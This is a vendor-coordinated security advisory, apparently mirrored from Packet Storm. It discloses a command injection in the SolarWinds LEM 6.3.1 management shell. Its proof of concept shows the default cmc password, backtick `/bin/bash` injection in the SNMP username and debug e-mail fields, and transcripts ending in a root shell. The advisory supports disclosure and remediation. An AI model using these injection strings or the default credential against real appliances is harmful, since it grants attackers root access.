Solarwinds LEM 6.3.1 Shell Escape Command Injection

2017-04-24T00:00:00
ID PACKETSTORM:142277
Type packetstorm
Reporter Hank Leininger
Modified 2017-04-24T00:00:00

Description

                                        
                                            `KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection  
  
Title: Solarwinds LEM Management Shell Escape via Command Injection  
Advisory ID: KL-001-2017-007  
Publication Date: 2017.04.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Solarwinds  
Affected Product: Log and Event Manager Virtual Appliance  
Affected Version: v6.3.1  
Platform: Embedded Linux  
CWE Classification: CWE-78: Improper Neutralization of Special  
Elements used in an OS Command  
Impact: Privileged Access  
Attack vector: SSH  
  
2. Vulnerability Description  
  
Insufficient input validation in the management interface can  
be leveraged in order to execute arbitrary commands. This can  
lead to (root) shell access to the underlying operating system.  
  
3. Technical Description  
  
Should an attacker gain access to the SSH console for the  
cmc user, root access to the underlying operating system can be  
achieved. The default password for the cmc user is "password".  
  
This report details two distinct attack vectors: the username  
input during SNMP setup and the destination email input  
during debug.  
  
============  
= SNMP =  
============  
  
This is accomplished by placing `/bin/bash` in the username  
input during SNMP server setup.  
  
$ ssh cmc@1.3.3.7  
Password:  
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64  
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6  
//////////////////////////////////////////////////  
/// SolarWinds Log & Event Manager ///  
/// management console ///  
//////////////////////////////////////////////////  
  
Detected VMware Virtual Platform  
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH  
Available commands:  
[ appliance ] Network, System  
[ manager ] Upgrade, Debug  
[ service ] Restrictions, SSH, Snort  
[ ndepth ] nDepth Configuration/Maintenance  
upgrade Upgrade this Appliance  
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)  
import Import a file that can be used from the Admin UI  
help display this help  
exit Exit  
cmc > service  
Available commands:  
startssh Start the SSH Service  
stopssh Stop the SSH Service  
restartssh Restart the SSH Service  
restrictssh Restrict Access to the SSH Service (by IP Address/hostname)  
unrestrictssh Remove Restrictions on Access to the SSH Service  
snmp Configure the SNMP Services  
copysnortrules Copy Snort rules to floppy or network share  
loadsnortrules Load Snort rules from floppy or network share  
loadsnortbackup Load Snort rules from backup  
restartsnort Restart the Snort Service  
enableflow * Enable the flow Collection Service  
disableflow Disable the flow Collection Service  
restrictconsole Restrict Access to the Manager Console (GUI) by IP/hostname  
unrestrictconsole Remove Restrictions on Access to the Console (GUI)  
restrictreports Restrict Access to Reports by IP/hostname  
unrestrictreports Remove Restrictions on Access to Reports  
stopopsec Stop all running OPSEC LEA client connections  
help display this help  
exit Return to main menu  
  
NOTE: Commands with an asterisk (*) include an automatic manager service restart  
cmc::service > snmp  
SNMP Trap Logging Service is RUNNNING  
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y  
  
SNMP Request Service is RUNNNING  
Would you like to STOP the SNMP Request Service? [Y/n] Y  
  
The SNMP Trap Logging Service is stopped.  
The SNMP Request Service is stopped.  
cmc::service > snmp  
SNMP Trap Logging Service is DISABLED  
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y  
  
SNMP Request Service is DISABLED  
Would you like to ENABLE the SNMP Request Service? [Y/n] Y  
  
Enter the port number to access SNMP on LEM (default: 161):  
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`  
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):  
Enter the authentication password (default: orion123):  
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):  
Enter the encryption key (default: orion123):  
  
cmc@swi-lem:/usr/local/contego$  
  
  
============  
= Debug =  
============  
  
This is accomplished by placing `/bin/bash` in the destination  
email input during debug.  
  
$ ssh cmc@1.3.3.7  
Password:  
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64  
Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6  
//////////////////////////////////////////////////  
/// SolarWinds Log & Event Manager ///  
/// management console ///  
//////////////////////////////////////////////////  
  
Detected VMware Virtual Platform  
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH  
Available commands:  
[ appliance ] Network, System  
[ manager ] Upgrade, Debug  
[ service ] Restrictions, SSH, Snort  
[ ndepth ] nDepth Configuration/Maintenance  
upgrade Upgrade this Appliance  
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)  
import Import a file that can be used from the Admin UI  
help display this help  
exit Exit  
cmc > manager  
Available commands:  
actortoolupgrade * Upgrade your Manager's Actor Tools (CD/floppy)  
archiveconfig Set your Manager Database Archive Schedule/Settings  
backupconfig Set your Manager Backup Schedule/Settings  
cleanagentconfig Reconfigure the agent on this box to a new manager  
configurendepth * Configure the manager to use an nDepth server.  
confselfsignedcert * Configure the manager to use a self signed certificate  
dbrestart Restart database  
debug Send Debugging Information to an Alternate Address  
disabletls Disable TLS for DB connections  
enabletls Enable TLS for DB connections  
exportcert Export the CA certificate for console  
exportcertrequest Export a certificate request for signing by CA  
hotfix Install LEM hotfix.  
importcert * Import a certificate used for console communication  
importl4ca * Import a CA of the other node in L4 configuration  
licenseupgrade * Upgrade your Manager License (CD/floppy/network)  
logbackupconfig Set your Manager Log Backup Schedule/Settings  
resetadmin Reset the "admin" user password to default  
restart * Restart Manager Service  
sensortoolupgrade Upgrade your Manager and Agent Sensor Tools (CD/floppy)  
showlog Show Manager Log File  
showmanagermem Show the memory setting of SolarWinds manager  
start Start Manager Service  
stop * Stop Manager Service  
support Send Debugging Information to Tech Support @trigeo.com  
togglehttp * Enable or disable HTTP (port 80).  
viewsysinfo Show information about machine and SolarWinds manager  
watchlog Watch Manager Log File  
exit Return to main menu  
  
NOTE: Commands with an asterisk (*) include an automatic manager service restart  
cmc::manager > debug  
Press <enter> to capture debugging information  
You will need to provide an SMTP server or Windows File Sharing Credentials  
  
Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
.e.sudo: unable to resolve host swi-lem  
sudo: unable to resolve host swi-lem  
.cat: /etc/hosts: No such file or directory  
done.  
sudo: unable to resolve host swi-lem  
E-Mail/Network share/Quit? (e/n/q) e  
E-Mail/Network share/Quit? (e/n/q) e  
Please enter the e-mail recipient:  
(e.g. support@trigeo.com)  
> `/bin/bash >&2`  
Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y  
Please enter the name this message should appear from  
(e.g. Someone Important)  
> Test  
Is the name Test correct? <Y/n> Y  
Please enter the e-mail address this message should appear from  
(e.g. someone@trigeo.com)  
> fake@localhost  
Is the e-mail address fake@localhost correct? <Y/n> Y  
Please enter the SMTP server you wish to send mail through  
(e.g. smtp.yournetwork.com)  
> 127.0.0.1  
Is the SMTP server 127.0.0.1 correct? <Y/n> Y  
Please enter the name of your company  
(e.g. Initech, Post Falls branch or Veridian Dynamics)  
> Test  
Is the company Test correct? <Y/n> Y  
Please enter a phone number where you can be reached  
(e.g. 509.555.1234)  
> Test  
Is the number Test correct? <Y/n> Y  
  
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--  
/tmp # id  
uid=0(root) gid=0(root) groups=0(root)  
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released a Hotfix to remediate this  
vulnerability. Hotfix and installation instructions are  
available at:  
  
https://thwack.solarwinds.com/thread/111223  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
and Hank Leininger of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.02.16 - KoreLogic sends vulnerability report and PoC to  
Solarwinds <psirt@solarwinds.com> using PGP key  
with fingerprint  
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.  
2017.02.20 - Solarwinds replies that the key is no longer in  
use, requests alternate communication channel.  
2017.02.22 - KoreLogic submits vulnerability report and PoC to  
alternate Solarwinds contact.  
2017.02.23 - Solarwinds confirms receipt of vulnerability  
report.  
2017.04.06 - 30 business days have elapsed since Solarwinds  
acknowledged receipt of vulnerability details.  
2017.04.11 - Solarwinds releases hotfix and public disclosure.  
2017.04.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`